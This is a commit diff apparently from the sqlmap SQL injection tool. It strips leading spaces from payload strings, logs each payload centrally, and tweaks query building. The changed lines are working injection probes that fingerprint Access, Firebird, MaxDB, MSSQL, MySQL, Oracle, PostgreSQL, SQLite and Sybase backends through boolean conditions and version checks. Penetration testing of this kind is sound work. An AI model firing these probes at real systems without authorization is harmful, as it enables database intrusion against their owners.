major improvement with display of payloads (all payloads are displayed now) and removal of "pesky" spaces

lib/core/agent.py

@@ -36,8 +36,8 @@ class Agent:
         kb.misc.stop      = randomStr(6)
 
     def payloadDirect(self, query):
-        if query.startswith(" AND "):
+        if query.startswith("AND "):
-            query = query.replace(" AND ", "SELECT ", 1)
+            query = query.replace("AND ", "SELECT ", 1)
         elif query.startswith(" UNION ALL "):
             query = query.replace(" UNION ALL ", "", 1)
         elif query.startswith("; "):

lib/request/connect.py

@@ -318,6 +318,11 @@ class Connect:
 
                 value = agent.replacePayload(value, payload)
 
+        payload = agent.extractPayload(value)
+        if payload:
+            debugMsg = "payload: %s" % payload
+            logger.debug(debugMsg)
+
         if place == "Cookie" and conf.cookieUrlencode:
             value = agent.removePayloadDelimiters(value, False)
             value = urlEncodeCookieValues(value)

lib/request/inject.py

@@ -399,9 +399,6 @@ def goStacked(expression, silent=False):
     query   = agent.prefixQuery("; %s" % expression)
     query   = agent.postfixQuery("%s;%s" % (query, comment))
 
-    debugMsg = "query: %s" % query
-    logger.debug(debugMsg)
-
     payload = agent.payload(newValue=query)
     page, _ = Request.queryPage(payload, content=True, silent=silent)
 

lib/techniques/blind/inference.py

@@ -75,9 +75,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
     else:
         expressionUnescaped              = unescaper.unescape(expression)
 
-    debugMsg = "query: %s" % expressionUnescaped
-    logger.debug(debugMsg)
-
     if length and not isinstance(length, int) and length.isdigit():
         length = int(length)
 

lib/techniques/error/use.py

@@ -64,9 +64,6 @@ def errorUse(expression, returnPayload=False):
 
     forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
 
-    debugMsg = "query: %s" % forgedQuery
-    logger.debug(debugMsg)
-
     payload = agent.payload(newValue=forgedQuery)
     result = Request.queryPage(payload, content=True)
     match = re.search('%s(?P<result>.*?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE)

lib/techniques/inband/union/use.py

@@ -197,9 +197,6 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, nullCh
         query = agent.forgeInbandQuery(expression, nullChar=nullChar)
         payload = agent.payload(newValue=query)
 
-        debugMsg = "query: %s" % query
-        logger.debug(debugMsg)
-
         # Perform the request
         resultPage, _ = Request.queryPage(payload, content=True)
         reqCount += 1

lib/utils/parenthesis.py

@@ -45,8 +45,8 @@ def checkForParenthesis():
         randInt = randomInt()
         randStr = randomStr()
 
-        query  = case.usage.prefix.format % eval(case.usage.prefix.params) +\
+        query = case.usage.prefix.format % eval(case.usage.prefix.params)
-            case.usage.postfix.format % eval(case.usage.postfix.params)
+        query = query[:-1] + case.usage.postfix.format % eval(case.usage.postfix.params)
 
         payload = agent.payload(newValue=query)
         result = Request.queryPage(payload)

plugins/dbms/access/fingerprint.py

@@ -161,14 +161,14 @@ class Fingerprint(GenericFingerprint):
         logMsg = "testing Microsoft Access"
         logger.info(logMsg)
 
-        payload = agent.fullPayload(" AND VAL(CVAR(1))=1")
+        payload = agent.fullPayload("AND VAL(CVAR(1))=1")
         result  = Request.queryPage(payload)
 
         if result:
             logMsg = "confirming Microsoft Access"
             logger.info(logMsg)
 
-            payload = agent.fullPayload(" AND IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0")
+            payload = agent.fullPayload("AND IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0")
             result  = Request.queryPage(payload)
 
             if not result:

plugins/dbms/firebird/fingerprint.py

@@ -72,10 +72,10 @@ class Fingerprint(GenericFingerprint):
     def __sysTablesCheck(self):
         retVal = None
         table = (
-                    ("1.0", [" AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)"]),
+                    ("1.0", ["AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)"]),
-                    ("1.5", [" AND NULLIF(%d,%d) IS NULL", " AND EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)"]),
+                    ("1.5", ["AND NULLIF(%d,%d) IS NULL", "AND EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)"]),
-                    ("2.0", [" AND EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", " AND BIT_LENGTH(%d)>0", " AND CHAR_LENGTH(%d)>0"]),
+                    ("2.0", ["AND EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "AND BIT_LENGTH(%d)>0", "AND CHAR_LENGTH(%d)>0"]),
-                    ("2.1", [" AND BIN_XOR(%d,%d)=0", " AND PI()>0.%d", " AND RAND()<1.%d", " AND FLOOR(1.%d)>=0"])
+                    ("2.1", ["AND BIN_XOR(%d,%d)=0", "AND PI()>0.%d", "AND RAND()<1.%d", "AND FLOOR(1.%d)>=0"])
                  )
 
         for i in xrange(len(table)):
@@ -97,7 +97,7 @@ class Fingerprint(GenericFingerprint):
     def __dialectCheck(self):
         retVal = None
         if kb.dbms:
-            payload = agent.fullPayload(" AND EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)")
+            payload = agent.fullPayload("AND EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)")
             result  = Request.queryPage(payload)
             retVal = "dialect 3" if result else "dialect 1"
         return retVal
@@ -116,14 +116,14 @@ class Fingerprint(GenericFingerprint):
 
         randInt = randomInt()
 
-        payload = agent.fullPayload(" AND EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt))
+        payload = agent.fullPayload("AND EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt))
         result  = Request.queryPage(payload)
 
         if result:
             logMsg = "confirming Firebird"
             logger.info(logMsg)
 
-            payload = agent.fullPayload(" AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)")
+            payload = agent.fullPayload("AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)")
             result  = Request.queryPage(payload)
 
             if not result:

plugins/dbms/maxdb/fingerprint.py

@@ -118,14 +118,14 @@ class Fingerprint(GenericFingerprint):
 
         randInt = randomInt()
 
-        payload = agent.fullPayload(" AND NOROUND(%d)=%d" % (randInt, randInt))
+        payload = agent.fullPayload("AND NOROUND(%d)=%d" % (randInt, randInt))
         result  = Request.queryPage(payload)
 
         if result:
             logMsg = "confirming SAP MaxDB"
             logger.info(logMsg)
 
-            payload = agent.fullPayload(" AND MAPCHAR(NULL,1,DEFAULTMAP) IS NULL")
+            payload = agent.fullPayload("AND MAPCHAR(NULL,1,DEFAULTMAP) IS NULL")
             result  = Request.queryPage(payload)
 
             if not result:

plugins/dbms/mssqlserver/fingerprint.py

@@ -90,7 +90,7 @@ class Fingerprint(GenericFingerprint):
             result = True
         else:
             randInt = randomInt()
-            payload = agent.fullPayload(" AND BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt))
+            payload = agent.fullPayload("AND BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt))
             result  = Request.queryPage(payload)
 
         if result:
@@ -99,10 +99,10 @@ class Fingerprint(GenericFingerprint):
 
             for version in (0, 5, 8):
                 randInt = randomInt()
-                query   = " AND %d=(SELECT (CASE WHEN (( SUBSTRING((@@VERSION), 22, 1)=2 AND SUBSTRING((@@VERSION), 25, 1)=%d ) OR ( SUBSTRING((@@VERSION), 23, 1)=2 AND SUBSTRING((@@VERSION), 26, 1)=%d )) THEN %d ELSE %d END))" % (randInt, version, version, randInt, (randInt + 1))
+                query   = "AND %d=(SELECT (CASE WHEN (( SUBSTRING((@@VERSION), 22, 1)=2 AND SUBSTRING((@@VERSION), 25, 1)=%d ) OR ( SUBSTRING((@@VERSION), 23, 1)=2 AND SUBSTRING((@@VERSION), 26, 1)=%d )) THEN %d ELSE %d END))" % (randInt, version, version, randInt, (randInt + 1))
 
                 if conf.direct:
-                    query = query.replace(" AND ", "SELECT 1 WHERE ", 1)
+                    query = query.replace("AND ", "SELECT 1 WHERE ", 1)
 
                 payload = agent.fullPayload(query)
                 result  = Request.queryPage(payload)
@@ -124,7 +124,7 @@ class Fingerprint(GenericFingerprint):
                         break
 
                     else:
-                        query   = " AND %d=(SELECT (CASE WHEN (SUBSTRING((@@VERSION), 22, 1)=7) THEN %d ELSE %d END))" % (randInt, randInt, (randInt + 1))
+                        query   = "AND %d=(SELECT (CASE WHEN (SUBSTRING((@@VERSION), 22, 1)=7) THEN %d ELSE %d END))" % (randInt, randInt, (randInt + 1))
                         payload = agent.fullPayload(query)
                         result  = Request.queryPage(payload)
 

plugins/dbms/mysql/fingerprint.py

@@ -156,14 +156,14 @@ class Fingerprint(GenericFingerprint):
         logger.info(infoMsg)
 
         randInt = getUnicode(randomInt(1))
-        payload = agent.fullPayload(" AND CONNECTION_ID()=CONNECTION_ID()")
+        payload = agent.fullPayload("AND CONNECTION_ID()=CONNECTION_ID()")
         result  = Request.queryPage(payload)
 
         if result:
             infoMsg = "confirming MySQL"
             logger.info(infoMsg)
 
-            payload = agent.fullPayload(" AND ISNULL(1/0)" if kb.injPlace != "URI" else " AND ISNULL(1 DIV 0)")
+            payload = agent.fullPayload("AND ISNULL(1/0)" if kb.injPlace != "URI" else "AND ISNULL(1 DIV 0)")
             result  = Request.queryPage(payload)
 
             if not result:

plugins/dbms/oracle/fingerprint.py

@@ -80,7 +80,7 @@ class Fingerprint(GenericFingerprint):
         if conf.direct:
             result = True
         else:
-            payload = agent.fullPayload(" AND ROWNUM=ROWNUM")
+            payload = agent.fullPayload("AND ROWNUM=ROWNUM")
             result  = Request.queryPage(payload)
 
         if result:
@@ -92,7 +92,7 @@ class Fingerprint(GenericFingerprint):
             if conf.direct:
                 result = True
             else:
-                payload = agent.fullPayload(" AND LENGTH(SYSDATE)=LENGTH(SYSDATE)")
+                payload = agent.fullPayload("AND LENGTH(SYSDATE)=LENGTH(SYSDATE)")
                 result  = Request.queryPage(payload)
 
             if not result:

plugins/dbms/postgresql/fingerprint.py

@@ -86,14 +86,14 @@ class Fingerprint(GenericFingerprint):
 
         randInt = getUnicode(randomInt(1))
 
-        payload = agent.fullPayload(" AND %s::int=%s" % (randInt, randInt))
+        payload = agent.fullPayload("AND %s::int=%s" % (randInt, randInt))
         result  = Request.queryPage(payload)
 
         if result:
             infoMsg = "confirming PostgreSQL"
             logger.info(infoMsg)
 
-            payload = agent.fullPayload(" AND COALESCE(%s, NULL)=%s" % (randInt, randInt))
+            payload = agent.fullPayload("AND COALESCE(%s, NULL)=%s" % (randInt, randInt))
             result  = Request.queryPage(payload)
 
             if not result:

plugins/dbms/sqlite/fingerprint.py

@@ -80,14 +80,14 @@ class Fingerprint(GenericFingerprint):
         logMsg = "testing SQLite"
         logger.info(logMsg)
 
-        payload = agent.fullPayload(" AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()")
+        payload = agent.fullPayload("AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()")
         result  = Request.queryPage(payload)
 
         if result:
             logMsg = "confirming SQLite"
             logger.info(logMsg)
 
-            payload = agent.fullPayload(" AND SQLITE_VERSION()=SQLITE_VERSION()")
+            payload = agent.fullPayload("AND SQLITE_VERSION()=SQLITE_VERSION()")
             result  = Request.queryPage(payload)
 
             if not result:

plugins/dbms/sybase/fingerprint.py

@@ -79,14 +79,14 @@ class Fingerprint(GenericFingerprint):
         if conf.direct:
             result = True
         else:
-            payload = agent.fullPayload(" AND tempdb_id()=tempdb_id()")
+            payload = agent.fullPayload("AND tempdb_id()=tempdb_id()")
             result  = Request.queryPage(payload)
 
         if result:
             logMsg = "confirming Sybase"
             logger.info(logMsg)
 
-            payload = agent.fullPayload(" AND suser_id()=suser_id()")
+            payload = agent.fullPayload("AND suser_id()=suser_id()")
             result  = Request.queryPage(payload)
 
             if not result:
@@ -104,7 +104,7 @@ class Fingerprint(GenericFingerprint):
 
             for version in range(12, 16):
                 randInt = randomInt()
-                query   = " AND @@VERSION_NUMBER/1000=%d" % version
+                query   = "AND @@VERSION_NUMBER/1000=%d" % version
                 payload = agent.fullPayload(query)
                 result  = Request.queryPage(payload)
                 if result: